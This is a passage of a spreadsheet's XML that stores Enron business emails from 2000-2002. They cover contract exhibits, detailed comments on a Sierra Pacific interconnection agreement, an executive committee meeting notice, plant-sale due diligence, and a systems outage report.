I will discuss with Karen and Brian the other remaining assets. _x000D_
_x000D_
Regards,_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Clayton, Paul  _x000D_
Sent:	Monday, October 08, 2001 2:13 PM_x000D_
To:	Coffey Jr., Jim_x000D_
Subject:	Replacement Cost Values_x000D_
_x000D_
Jim:_x000D_
Please update accordingly._x000D_
Thanks,_x000D_
_x000D_
_x000D_
 &lt;&lt; File: ENAREPLACEMENT COSTS 2001.xls &gt;&gt; </t>
  </si>
  <si>
    <t>Fri, 22 Dec 2000 09:24:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Exhibit H-2</t>
  </si>
  <si>
    <t xml:space="preserve">This is an exhibit to the CA agreements._x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 12/22/2000 05:23 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
"Thompson, Peter J." &lt;peterthompson@akllp.com&gt; on 12/22/2000 01:33:22 PM_x000D_
To: &lt;suzanne.adams@enron.com&gt;_x000D_
cc: "Kay Mann (E-mail)" &lt;kay.mann@enron.com&gt; _x000D_
_x000D_
Subject: Exhibit H-2_x000D_
_x000D_
This needs to be inserted as Exhibit H-2 in all three agreements.  I_x000D_
will be sending those agreements momentarily._x000D_
_x000D_
-----Original Message-----_x000D_
From: Kay.Mann@enron.com [mailto:Kay.Mann@enron.com]_x000D_
Sent: Thursday, December 21, 2000 7:07 PM_x000D_
To: Thompson, Peter J._x000D_
Subject: FW: ENRON - Meeting - Training Scope_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 12/21/2000_x000D_
06:06_x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
lee.johnson@ss.ps.ge.com on 12/21/2000 04:25:08 PM_x000D_
_x000D_
To:   kay.mann@enron.com_x000D_
cc:   john.r.ayres@enron.com_x000D_
_x000D_
Subject:  FW: ENRON - Meeting - Training Scope_x000D_
_x000D_
I'm forwarding this per my conversion with John Ayres as the Training_x000D_
insert_x000D_
H-2_x000D_
_x000D_
&gt; -----Original Message-----_x000D_
&gt; From:         Johnson, Lee L (PS, SSEP)_x000D_
&gt; Sent:         Friday, March 17, 2000 3:50 PM_x000D_
&gt; To:           'kathleen.clark@enron.com'; 'michael.d.nanny@enron.com'_x000D_
&gt; Cc:           Davis, David F (PS, SSEP); Kuo, Kathy (PS, SSEP);_x000D_
&gt; 'chris.booth@enron.com'_x000D_
&gt; Subject:           FW: ENRON - Meeting - Training Scope_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Kathy/Mike-_x000D_
&gt;_x000D_
&gt; Attached is our latest Training Course agenda.  Since our Engine and_x000D_
&gt; Packaging businesses are now organized as one, we've combined the_x000D_
Engine_x000D_
&gt; Familiarization and Generator Set Operator Training Courses into a_x000D_
single_x000D_
&gt; Training Course.  We would envision providing this training at each_x000D_
&gt; Facility Site._x000D_
&gt;_x000D_
&gt; This outline should be used to replace the language in Exhibit H-2 to_x000D_
&gt; accurately describe the current course agenda.  We'll discuss the_x000D_
content_x000D_
&gt; in detail on Tuesday with Mike, to be sure that nothing is dropped_x000D_
from_x000D_
&gt; the Training content._x000D_
&gt;_x000D_
&gt; Thanks,_x000D_
&gt;_x000D_
&gt; Lee_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; -----Original Message-----_x000D_
&gt; From:         Kuo, Kathy (PS, SSEP)_x000D_
&gt; Sent:         Thursday, March 16, 2000 11:12 AM_x000D_
&gt; To:           Roy Allice (E-mail)_x000D_
&gt; Cc:           Johnson, Lee L (PS, SSEP)_x000D_
&gt; Subject:           ENRON - Meeting - Training Scope_x000D_
&gt;_x000D_
&gt; Roy,_x000D_
&gt;_x000D_
&gt; 1.  MEETING INFORMATION:_x000D_
&gt; Who:          Enron, Lee Johnson, Kathy Kuo, Roy Allice_x000D_
&gt; Where:        Downtown Houston. 3 Allen Center, 333 Clay St., Suite_x000D_
400_x000D_
&gt; (sign in)._x000D_
&gt; When:         1:30 PM - ?  (Lee Johnson to confirm)_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; 2.  Attached is the file David Davis sent to Lee for Enron Training_x000D_
Scope._x000D_
&gt; Note that it is the 5-day Basic Op._x000D_
&gt;_x000D_
&gt;  &lt;&lt;Training LM6000.pdf&gt;&gt;_x000D_
&gt;_x000D_
&gt; 3.  Please confirm (per our discussion this morning) that you will be_x000D_
able_x000D_
&gt; to attend this meeting.  If not, please let me know if there is_x000D_
someone_x000D_
&gt; that can attend in your place._x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Thanks!_x000D_
&gt; Kathy_x000D_
(See attached file: Training LM6000.pdf)_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 5 May 2000 05:21:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'maureen.smith@enron.com'})</t>
  </si>
  <si>
    <t>KeySpan Ravenswood</t>
  </si>
  <si>
    <t xml:space="preserve">Please see attached draft of a GISB sent this morning to Terrence Kain. _x000D_
</t>
  </si>
  <si>
    <t>Tue, 22 Jan 2002 07:26:59 -0800 (PST)</t>
  </si>
  <si>
    <t>Dan Diamond</t>
  </si>
  <si>
    <t>Would like to be considered for a promotion to Director as part of the move to UBS._x000D_
_x000D_
I explained that a promotion for him was not planned at this time and he asked if I would raise the issue with you._x000D_
_x000D_
Dave</t>
  </si>
  <si>
    <t>Thu, 15 Feb 2001 08:46:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dale.rasmussen@enron.com', 'don.hammond@enron.com', 'stan.gray@enron.com', 'ed.clark@enron.com', 'jim.gilbert@enron.com'})</t>
  </si>
  <si>
    <t>My comments on Sierra Pacific's Draft interconnection agreement</t>
  </si>
  <si>
    <t>The following are my comments on the draft interconnection agreement._x000D_
_x000D_
In the sixth "whereas" (page 1) (and Sections 3.4 and 5.1.6) the contract _x000D_
states that either the generating company or the generating company's _x000D_
customers are responsible for entering into a separate service for _x000D_
transmission service.  In any given transaction this may be incorrect and _x000D_
therefore must be changed.  Specifically, a third person may in fact be _x000D_
responsible for taking the transmission service and the generator may have no _x000D_
ability (or privity of contract) to require this entity to take transmission _x000D_
service from Sierra Pacific.  For example, the generator may sell the power _x000D_
to Dynegy, who may sell it to Sierra Pacific who might then be buying the _x000D_
transmission service.  _x000D_
_x000D_
The eighth "Whereas" (page 1) (and Sections 2.18, 3.1, 31.7, E.4.1, E.4.2, _x000D_
E.8.2, E.8.3, E.8.4, E.8.6, E.8.7, E.11.10, E.11.11, and E.12.) state the _x000D_
generating company is willing to maintain the generating facilities in _x000D_
accordance with good utility practice and enter into a WSCC Reliability _x000D_
Management System (RMS) Agreement.  I would like to point out that some _x000D_
generators do not like to commit to the "good utility" practice standard or _x000D_
to be bound by the RMS agreement.  Enron has signed the RMS Agreement.  I _x000D_
doubt Sierra will be willing to sign this if we oppose the good utility _x000D_
practice standard.  This is especially true because BPA is insisting on this _x000D_
standard in the context of negotiating RTO West and, in order for RTO West to _x000D_
form, BPA must agree to join.  Enron is very interested in RTO West forming.  _x000D_
If you want to oppose the Good Utility Practice standard, we had better _x000D_
develop a good rationale for being opposed to it and a justifiable _x000D_
alternative standard._x000D_
_x000D_
Section 1.1  Contrary to our requests, this section still states that the _x000D_
agreement will become effective on the date which FERC permits it to become _x000D_
effective.   This is not the way the OATT operates.  Rather, if Enron and _x000D_
Sierra cannot develop a consensual interconnection agreement, Enron asks _x000D_
Sierra to file an unexecuted interconnection agreement with FERC (as we have _x000D_
done) and service begins pursuant to the terms and conditions of Sierra's _x000D_
open access tariff.  Service here is governed by the transmission open access _x000D_
tariff because FERC has determined that interconnection is the receipt point _x000D_
portion of transmission service and that if a public utility does not have a _x000D_
separate tariff governing the procedure for requesting the interconnection _x000D_
portion of transmission service than the procedure established in the OATT _x000D_
applies.  The FERC has determined that filings under Section 212 (and _x000D_
therefor 211) of the Federal Power Act are no longer necessary because the _x000D_
customer simply requests service under the OATT.  Requiring the customer to _x000D_
wait until the FERC decides the agreement should become effective would _x000D_
completely  undermine the purpose of Order No. 888._x000D_
_x000D_
Section 1.2 After, "by both parties" add "however, if the parties cannot _x000D_
agree to execute this agreement, System Owner shall file this agreement _x000D_
unexecuted with FERC as provided by the terms of the OATT."_x000D_
_x000D_
Section 1.6.2   Three years advance written notice is too long.  A reasonable _x000D_
notice period would be ____._x000D_
_x000D_
Section 2.6, 2.7 and 2.8 EPMI opposes the definitions of "Applicable Laws" _x000D_
"Applicable Permits" and "Applicable Reliability Criteria" because, when _x000D_
combined with their use throughout the contract (in Sections 2.6, 3.5, 3.10, _x000D_
3.11, 5.6.2, 5.6.3, 8.4.2, 11.8, E.2.8, E.3.3, E.4.1, E.4.3, E.4.4, and _x000D_
E.9.5) they subject EPMI to legal and regulatory risk by consenting to _x000D_
amendment of the contract by government action.  _x000D_
_x000D_
Section 2.19 Section (i) of the definition of "Dispatch gives Sierra too much _x000D_
control over the generating unit by allowing it to redispatch for "the most _x000D_
reliable" supply.  Change "the most reliable" to "a reliable"_x000D_
_x000D_
Section 2.31 Is inconsistent with Sierra's OATT.  It should be written using _x000D_
the same words as the OATT._x000D_
_x000D_
Section 2.52  The reference to Section 22.1 should be corrected to 21.1._x000D_
_x000D_
Section 2.56 Definition of "System Integrity" is too broad.  When combined _x000D_
with Section 3.13.2, it would require our generator to not "have an adverse _x000D_
impact on "maximiz[ing] the health, welfare, safety of personnel and the _x000D_
general public."  While Sierra can voluntarily do so with its own facilities, _x000D_
there is no reliability or governmental requirement that we do so and we _x000D_
should not._x000D_
_x000D_
Section 3.5 The proposed Use of "System Integrity" here is more fair assuming _x000D_
EPMI agrees to the "Good Utility Practice" standard._x000D_
_x000D_
Section 3.7 Shouldn't the word "unplanned" be added before the word Outages?_x000D_
_x000D_
Section 3.8 EPMI opposes this provision to the extent that it would be _x000D_
directly assigned the cost of facilities that are being used by others._x000D_
_x000D_
Section 3.10 The second sentence exposes EPMI  to regulatory risk by allowing _x000D_
Sierra to add new facilities and charge them to EPMI.    This risk is _x000D_
increased by the last sentence which allows Sierra to determine the need for _x000D_
such facilities in its sole discretion.  Editorial note: the third to last _x000D_
sentence is missing a period._x000D_
_x000D_
Section 3.13.2 See comments under Section 2.56._x000D_
_x000D_
Section 4.1 EPMI opposes the first sentence because it gives Sierra an _x000D_
opportunity to have FERC order additional payments for the same level of _x000D_
service already provided by this contract.  Accordingly, the words "or _x000D_
ordered by FERC" should be deleted.  _x000D_
_x000D_
EPMI opposes the second sentence because it would allow Sierra, with FERC's _x000D_
approval, to allocate to EPMI costs incurred for Sierra property and for _x000D_
operation of Sierra's facilities_x000D_
_x000D_
Section 4.3 Should the words "generating company's applicable FERC-approved _x000D_
tariff" be changed to "Applicable Law?"_x000D_
_x000D_
Section 5.1.1 EPMI opposes the last sentence because it would presumably _x000D_
require EPMI to pay more than cost for any project whose scope does not _x000D_
increase by more than 10 percent.  Under FERC's precedent, EPMI is only _x000D_
required to pay actual cost._x000D_
_x000D_
Section 5.1.3 Nine months seems like to long a time to wait to provide a _x000D_
final invoice._x000D_
_x000D_
The words "plus Interest" should be added after the words "difference" in the _x000D_
fourth sentence._x000D_
_x000D_
Section 5.6.2 This section says essentially the same thing as Section 3.10 _x000D_
and EPMI opposes it for the same reasons._x000D_
_x000D_
Section 6.4.3 Add period at end of sentence._x000D_
_x000D_
Section 7.1 Delete period after the word "and" in last sentence._x000D_
_x000D_
Section 8.1.4 Add period after "Interconnection Facilities."_x000D_
_x000D_
Section 8.4.2 EPMI opposes paying for all modifications to interconnection _x000D_
facilities to the extent that such modifications benefit Sierra or third _x000D_
parties._x000D_
_x000D_
Section 8.7.2 Delete the word "and" on the seventh line. _x000D_
_x000D_
Section 9.1.1 See comments under Sections 2.56._x000D_
_x000D_
Section 11.7 Delete "pen-nits" from last line on page and insert "permits."_x000D_
_x000D_
Section 11.8  After "remediation or abatement activity" insert "pay all _x000D_
fines, penalties, or compensations as required by law."_x000D_
_x000D_
Section 13.4 There should be a reciprocal provision for generators._x000D_
_x000D_
Section 16.2 EPMI opposes "regulatory" Force Majeure.  _x000D_
_x000D_
Section 16.6 This provision is too broad in that it allows the System _x000D_
Operator to evaluate the alternatives available to the EPMI._x000D_
_x000D_
Section 17.9 Add the letter "y" after "and ma" on the second line._x000D_
_x000D_
Section 19.2.1 Third to last line change "ahs" to "has."_x000D_
_x000D_
Section 19.3 Needs to be edited._x000D_
_x000D_
Section 19.6 This section subjects EPMI to the regulatory risk of amendment _x000D_
to the interconnection agreement to conform to an RTO's requirements.  _x000D_
_x000D_
Section 22.5 By law, System Operator should be required to file with FERC _x000D_
prior to terminating the connection._x000D_
_x000D_
Section 31.8  This section exposes EPMI to regulatory risk because it allows _x000D_
Sierra to unilaterally file with FERC to change the terms and conditions of _x000D_
the interconnection contract.  This is standard in utility tariffs and _x000D_
agreements and in fact is in the FERC's pro forma OATT under Order No. 888.  _x000D_
_x000D_
Section 31.9 of the contract retains EPMI's rights to protest any unilateral _x000D_
filing by Sierra under Section 31.8 and seems to balance the rights given to _x000D_
Sierra in Section 31.8 by allowing EPMI to file a complaint challenging any _x000D_
of the rates, terms, or conditions, etc., of the interconnection agreement._x000D_
_x000D_
Exhibit D D.1.1 EPMI should not be required to provide free station service _x000D_
to the extent it benefits Sierra Pacific or third parties.  A higher level of _x000D_
service should not simply be at the election of the System Owner but rather _x000D_
at the agreement of the Parties.   _x000D_
_x000D_
D.1.2 The phrase "Except under Applicable Law," should be added before the _x000D_
first sentence._x000D_
_x000D_
D.2 EPMI opposes providing free VArs and opposing providing VArs at a level _x000D_
determined by Sierra's discretion.  Accordingly, EPMI opposes this entire _x000D_
provision.  If Sierra wishes to purchase VArs, EPMI would agree to provide _x000D_
______ level of VArs at ____ rate.  EPMI would also agree to provide VArs at _x000D_
Sierra's discretion, subject to this rate, in the case of an Emergency.  _x000D_
Otherwise, EPMI would be foregoing the opportunity to provide real power _x000D_
(instead of VArs) to the market at a market-based rate, and it might be _x000D_
subject to having such transactions cut at Sierra's "discretion" without _x000D_
being assured the cost of cover.  Accordingly, the rate standard of cost or _x000D_
foregone revenues would not be compensatory._x000D_
_x000D_
D.3 EPMI opposes this provision to the extent that it could be read to _x000D_
require EPMI to provide free Black Start Service._x000D_
_x000D_
D.4 Since the generator is not taking the delivery portion of transmission _x000D_
service, it is not required to buy or self provide any ancillary service _x000D_
including regulation and frequency response service of real-time load _x000D_
-following service.  Accordingly, this provision should be deleted._x000D_
_x000D_
D.5 EPMI opposes the second sentence of this paragraph and it should be _x000D_
deleted.  Sierra should get ancillary services from the market._x000D_
_x000D_
E.2 Change "minimized" to "minimize."_x000D_
_x000D_
E.2.4 Oppose requirement to notify Sierra of defects in generator "may affect _x000D_
System Integrity."_x000D_
_x000D_
E.4.1.3 EPMI opposes giving the Control Area Operator authority to "approve" _x000D_
Planned Outage Schedules._x000D_
_x000D_
E.4.4 Once again EPMI would oppose the use of the term "System Integrity" _x000D_
here as too high as standard._x000D_
_x000D_
E.6.5 The second sentence gives the Control Area Operator too broad authority _x000D_
to preclude Planned Outages._x000D_
_x000D_
E.7.1 Add the word "the" on line 4 after "at."_x000D_
_x000D_
E.8.1 EPMI opposes requiring the Generator to receive prior Control Area _x000D_
Operator authorization to undertake any action that is "reasonably likely to _x000D_
have an adverse impact of System Integrity," especially adjustment of the _x000D_
amount of real and reactive power it delivers to the Transmission system _x000D_
under E.8.1.1._x000D_
_x000D_
E.8.2.2 Because VArs could be sold as real power, System Control should not _x000D_
be allowed to "establish the range of voltages or voltage schedules."  _x000D_
Rather, Sierra Pacific should negotiate with EPMI to buy the level of voltage _x000D_
support it requires.  See also E.8.9 establishing power factors._x000D_
_x000D_
E.8.4 EPMI does not have a problem with operating its AGC within WSCC limits _x000D_
but it will not be providing this Ancillary Service free to Sierra.  We need _x000D_
to negotiate compensation._x000D_
_x000D_
E.8.6 Giving Sierra "sole discretion" to determine "unacceptable _x000D_
deterioration of the quality of service over its Transmission System" is too _x000D_
broad._x000D_
_x000D_
E.9.2 "Repots" should be "reports"</t>
  </si>
  <si>
    <t>Wed, 18 Apr 2001 03:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'billy.dorsey@enron.com'})</t>
  </si>
  <si>
    <t>re: Executive Committee Weekly Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">Stan Horton will attend in person._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Billy Dorsey@ENRON_DEVELOPMENT_x000D_
04/18/2001 10:21 AM_x000D_
To: Cliff Baxter/HOU/ECT, Jeremy Blachman/HOU/EES@EES, Philippe A _x000D_
Bibi/HOU/ECT, Raymond Bowen/HOU/ECT, Michael R Brown@ECT, Rick Buy/HOU/ECT, _x000D_
Richard Causey@ENRON, Wade Cline/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, David _x000D_
Cox@Enron Communications, David W Delainey/HOU/EES@EES, James V _x000D_
Derrick@ENRON, Steve Elliott@ENRON COMMUNICATIONS, Jim Fallon/Enron _x000D_
Communications@Enron Communications, Andrew S Fastow/HOU/ECT, Mark _x000D_
Frevert/NA/Enron, Ben Glisan@ECT, Kevin Hannon@ENRON COMMUNICATIONS, Rod _x000D_
Hayslett/FGT/Enron, Stanley Horton@ENRON, James A Hughes/ENRON_DEVELOPMENT, _x000D_
Steven J Kean/NA/Enron@Enron, Louise Kitchen@ECT, Mark Koenig@ENRON, Kenneth _x000D_
Lay@ENRON, John J Lavorato/Enron@EnronXGate, Dan Leff/HOU/EES@EES, Danny _x000D_
McCarty@Enron, Mike McConnell/HOU/ECT@ECT, Rebecca _x000D_
McDonald/ENRON_DEVELOPMENT, Jeffrey McMahon/HOU/ECT, Mark Metts/NA/Enron, _x000D_
Mark S Muller/HOU/EES@EES, Cindy Olson@ENRON, Karen S Owens@ees@EES, Ken _x000D_
Rice@ENRON COMMUNICATIONS, Matthew Scrimshaw@ECT, Jeffrey A _x000D_
Shankman/Enron@EnronXGate, Jeffrey Sherrick/Corp/Enron, John Sherriff@ECT, _x000D_
Jeff Skilling@ENRON, Marty Sunde/HOU/EES@EES, Greg Whalley@ECT, Thomas E _x000D_
White/HOU/EES@EES, Greg Piper/Corp/Enron, Janet R Dietrich/HOU/EES@EES_x000D_
cc: G G Garcia@Enron, Susan Skarness/HOU/ECT, Karen K Heathman/HOU/ECT, _x000D_
Sharron Westbrook@ENRON, Kay Chapman/HOU/EES@EES, Stephanie _x000D_
Harris/Corp/Enron, Bridget Maronge/HOU/ECT, Nicki Daw/NA/Enron, Inez C _x000D_
Dauterive@ECT, Carol Ann Brown@ECT, Cindy Stark@ENRON, Maureen _x000D_
McVicker/NA/Enron@Enron, Joannie Williamson@ENRON, Rosalee Fleming@ENRON, _x000D_
Tori L Wells@ECT, Cathy Phillips@ECT, Loretta Brelsford/ENRON_DEVELOPMENT, _x000D_
Sue Ford/HOU/ECT, Dolores Fisher/NA/Enron, Karen Owens/HOU/EES@EES, Dorothy _x000D_
Dalton@ENRON COMMUNICATIONS, Mercedes E Estrada@Enron Communications, _x000D_
Christina Grow@ENRON, Lauren Urquhart@ECT, Sherri Sera/Corp/Enron@ENRON, Liz _x000D_
M Taylor@ECT, Judy G Smith/HOU/EES@EES, Kathy McMahon/NA/Enron@Enron, Suzanne _x000D_
Danz@ENRON, Peggy McCurley/HOU/ECT, Marsha Schiller/HOU/ECT, Samantha _x000D_
Lopez-Dias/EU/Enron@Enron, Jana L Paxton/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, _x000D_
Connie Blackwood/ENRON_DEVELOPMENT, Tammie Schoppe@ECT, Kimberly _x000D_
Hillis/HOU/ECT, Jennifer Burns/HOU/ECT, Sharon Dick/HOU/EES@EES, Kathy _x000D_
Dodgen/HOU/EES@EES, Kerry Ferrari@ECT, Carol Moffett/HOU/EES@EES, Jennifer _x000D_
Adams@Enron Communications, Leah Rijo@ECT, Lucy Marshall/Enron _x000D_
Communications@Enron Communications, Kathy Campos/GPGFIN/Enron, Julie _x000D_
Armstrong@Enron, Binky Davidson/HOU/EES@EES, Mrudula _x000D_
Gadade/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Kelly Johnson@Enron, Rebecca _x000D_
Carter@ENRON, Tina Spiller/Corp/Enron, Vivianna Bolen/Corp/Enron, Linda _x000D_
Hawkins/Corp/Enron, Vanessa Bob/Corp/Enron _x000D_
_x000D_
Subject: re: Executive Committee Weekly Meeting_x000D_
_x000D_
Executive Committee Weekly Meeting_x000D_
Date:  Monday, April 23rd     _x000D_
Time:  11:00 a.m. (CDT)_x000D_
Location: 50th Floor Boardroom_x000D_
Video:  Connections will be established with remote locations upon request._x000D_
Conf call: AT&amp;T lines have been reserved.  Please contact Sherri Sera _x000D_
(713/853-5984) _x000D_
  or Bill Dorsey (713/646-6505) for the weekly dial-in number and passcode._x000D_
_x000D_
Please indicate below whether or not you plan to attend this meeting and _x000D_
through what medium. _x000D_
_x000D_
 Yes, I will attend in person ________x000D_
_x000D_
 By video conference from ________x000D_
_x000D_
 By conference call  ________x000D_
_x000D_
 No, I will not attend  ________x000D_
_x000D_
*  *  *_x000D_
_x000D_
Please return this e-mail to me with your response by 12:00 p.m., Friday, _x000D_
April 20th_x000D_
_x000D_
Thank you, _x000D_
Bill Dorsey._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 26 Sep 2000 16:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Additional PG&amp;E Question and an Aquila Question - all on Pastoria</t>
  </si>
  <si>
    <t xml:space="preserve">I spoke to Aquila again today.  They are planning to submit bids on Friday_x000D_
for Gleason, Wheatland and Pastoria.  They already have a tolling agreement_x000D_
in the Lincoln area and don't want more capacity there._x000D_
_x000D_
Aquila's question:_x000D_
_x000D_
They questioned the development costs for Pastoria - look very high.  I_x000D_
noted that it includes the ERC's.  They would like a breakout of the_x000D_
development costs_x000D_
_x000D_
_x000D_
PG&amp;E's question is below.  Are you comfortable disclosing this at this stage_x000D_
or is this a phase II due diligence item?_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Favinger, Thomas [mailto:thomas.favinger@neg.pge.com]_x000D_
Sent: Tuesday, September 26, 2000 5:17 PM_x000D_
To: 'Iaconetti, Louis'_x000D_
Subject: RE: Responses to PG&amp;E Questions on Pastoria_x000D_
_x000D_
_x000D_
Since we do not have to accept the NEPCO contract, can you break out the_x000D_
cost and scope of equipment (Enron uses the term "power islands")?  Can we_x000D_
get this information tomorrow?  Both cost and scope of this is important to_x000D_
be able to assess the "EPC" price and determine bid price._x000D_
</t>
  </si>
  <si>
    <t>Wed, 14 Mar 2001 23:44:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Wharton Business Plan Competition</t>
  </si>
  <si>
    <t>Vince and Jeff,_x000D_
_x000D_
Who should we list as a judge?  I could list myself to act as the point of _x000D_
contact and I'll also give my comments on the plans, but I think Enron's  _x000D_
"judge" should be someone in the capacity of evaluating Enron's early stage _x000D_
ventures._x000D_
_x000D_
Please let me know as soon as possible._x000D_
_x000D_
Thanks!_x000D_
_x000D_
--Christie._x000D_
----- Forwarded by Christie Patrick/HOU/ECT on 03/15/2001 07:40 AM -----_x000D_
_x000D_
	"Andrew Gaffney" &lt;gaffneya@wharton.upenn.edu&gt;_x000D_
	03/08/2001 08:47 AM_x000D_
		 _x000D_
		 To: &lt;Christie.Patrick@enron.com&gt;_x000D_
		 cc: "Stamer, Anne" &lt;stamer@wharton.upenn.edu&gt;_x000D_
		 Subject: Wharton Business Plan Competition_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Dear Ms. Patrick,_x000D_
?_x000D_
Anne Stamer asked me to contact you  regarding?Enron providing a judge for _x000D_
Phase III of the Business Plan  Competition.? Phase III judges are generally _x000D_
Partner-level individuals at  venture capital firms,?Managing Directors from _x000D_
investment banks, or other  senior individuals?who have extensive experience _x000D_
assessing and working with  early stage ventures.? A Phase III judge will _x000D_
receive five business plans,  with the entire judging process requiring 4-5 _x000D_
hours during the weeks of April 2  and April 9.? I am attaching a document _x000D_
that describes the competition and  judging procedures for Phase III in more _x000D_
detail.? We are looking to  finalize the list of Phase III judges by March _x000D_
23, so if you could please  forward either Anne or I the name of the _x000D_
appropriate individual, we can contact  them directly with more details.? _x000D_
Please let me know if you have further  questions and we appreciate your _x000D_
support of the Competition._x000D_
?_x000D_
Sincerely,_x000D_
?_x000D_
Andrew  Gaffney_x000D_
 - Phase III Judge Info 00-01.doc</t>
  </si>
  <si>
    <t>Wed, 18 Apr 2001 13:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'robert.hall@enron.com', 'jim.coffey@enron.com', 'anne.koehler@enron.com', 'fran.mayes@enron.com', 'mary.perkins@enron.com', 'thomas.martin@enron.com', 'tommy.yanowski@enron.com', 'barbara.gray@enron.com', 'sally.beck@enron.com', 'tanya.rohauer@enron.com'})</t>
  </si>
  <si>
    <t>AEP Actions</t>
  </si>
  <si>
    <t xml:space="preserve">Team:_x000D_
_x000D_
I have attached a memo that I would like to send to D. Hart setting out AEP's _x000D_
outstanding action items in respect to the Close.  Please review and provide _x000D_
any comments (e.g. additional actions for AEP or revised status for Enron) _x000D_
that I may have missed._x000D_
_x000D_
Thanks,_x000D_
Brian_x000D_
</t>
  </si>
  <si>
    <t>Fri, 5 Jan 2001 07:28:00 -0800 (PST)</t>
  </si>
  <si>
    <t>HPL Meter # 985225 FREEPORT OFFSHORE-RUTHERFORD</t>
  </si>
  <si>
    <t>Kim:_x000D_
_x000D_
Effective 7/1/2000 the volumes of gas that were previously purchased from _x000D_
Cinergy under Contract #96017060 should be allocated and purchased under the _x000D_
Fairways contract.  Per Vance Taylor, the Cinergy contract was terminated _x000D_
6/30/2000,_x000D_
_x000D_
If you have any questions, please call._x000D_
_x000D_
Thanks, Clem</t>
  </si>
  <si>
    <t>Fri, 6 Apr 2001 21:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>SUPPLEMENTAL Weekend Outage Report for 4-06-01 through 4-9-01</t>
  </si>
  <si>
    <t>------------------------------------------------------------------------------------------------------_x000D_
W E E K E N D   S Y S T E M S   A V A I L A B I L I T Y_x000D_
_x000D_
F O R_x000D_
_x000D_
April 6, 2001 5:00pm through April 9, 2001 12:00am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No Scheduled Outages._x000D_
_x000D_
FIELD SERVICES:  No Scheduled Outages._x000D_
_x000D_
INTERNET:       SEE ORIGINAL REPORT_x000D_
  _x000D_
MESSAGING:      SEE ORIGINAL REPORT_x000D_
 		     _x000D_
MARKET DATA: No Scheduled Outages._x000D_
_x000D_
NT: No Scheduled Outages._x000D_
_x000D_
OS/2:  No Scheduled Outages._x000D_
_x000D_
OTHER SYSTEMS:    SEE ORIGINAL REPORT_x000D_
		    		    		    		_x000D_
SITARA:  No Scheduled Outages._x000D_
_x000D_
SUN/OSS SYSTEM: No Scheduled Outages._x000D_
_x000D_
TELEPHONY:      SEE ORIGINAL REPORT_x000D_
  _x000D_
TERMINAL SERVER:  No Scheduled Outages._x000D_
_x000D_
UNIFY:  No Scheduled Outages._x000D_
_x000D_
_x000D_
SCHEDULED SYSTEM OUTAGES: CALGARY_x000D_
                            SEE ORIGINAL REPORT_x000D_
_x000D_
SCHEDULED SYSTEM OUTAGES: Australia_x000D_
Impact:  CORP_x000D_
Time:  Sun 8-April-2001  at  10:00:00 AM Sydney thru Sun 8-April-2001  at  3:00:00 PM Sydney_x000D_
	Sun 8-April-2001  at  1:00:00 AM GMT (London) thru Sun 8-April-2001  at  6:00:00 AM GMT (London)_x000D_
	Sat 4/7/2001 at  7:00:00 PM CT (Houston) thru Sun 4/8/2001 at  12:00:00 AM CT (Houston)_x000D_
	Sat 4/7/2001 at  5:00:00 PM PT  thru Sat 4/7/2001 at  10:00:00 PM PT	_x000D_
Outage:  Sydney UPS Installation_x000D_
Environments Impacted:  Corp Sydney_x000D_
Purpose: Additional UPS capacity to be added to server racks. Will require servers to be powered down &amp; remounted _x000D_
Backout: _x000D_
- Replace Servers to original position_x000D_
- Plug servers back to existing power._x000D_
Contact(s): 	Elliott Katz	+61-408-277-123_x000D_
		Colin Wood    +61-416-248-353_x000D_
_x000D_
_x000D_
 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t>
  </si>
  <si>
    <t>Tue, 16 May 2000 07:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Grag,_x000D_
_x000D_
I think it makes sense to visit with SKG and obtain more information._x000D_
I assume they are located in or near Boston. I shall be in Boston_x000D_
in mid June and can meet them._x000D_
_x000D_
Vince_x000D_
_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 05/16/2000 _x000D_
02:00 PM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Sherri Sera @ ENRON                           05/15/2000 04:29 PM_x000D_
	_x000D_
_x000D_
To: Greg Whalley/HOU/ECT@ECT_x000D_
cc: Liz M Taylor/HOU/ECT@ECT, Vince J Kaminski/HOU/ECT@ECT _x000D_
Subject: _x000D_
_x000D_
Greg, FYI - Jeff asked me to forward this to you for your review.  SRS_x000D_
---------------------- Forwarded by Sherri Sera/Corp/Enron on 05/15/2000 _x000D_
04:25 PM ---------------------------_x000D_
_x000D_
_x000D_
"Joseph A. Cherian" &lt;cherian@bu.edu&gt; on 05/09/2000 08:10:19 AM_x000D_
To: "Jeffrey K. Skilling" &lt;sreinar@enron.com&gt;_x000D_
cc: Vince J Kaminski &lt;vkamins@ect.enron.com&gt;, "Robert A. Jarrow" _x000D_
&lt;raj15@cornell.edu&gt;, "Robert C. Merton" &lt;rmerton@hbs.edu&gt; _x000D_
_x000D_
Subject: _x000D_
_x000D_
_x000D_
Mr. Jeffrey K. Skilling_x000D_
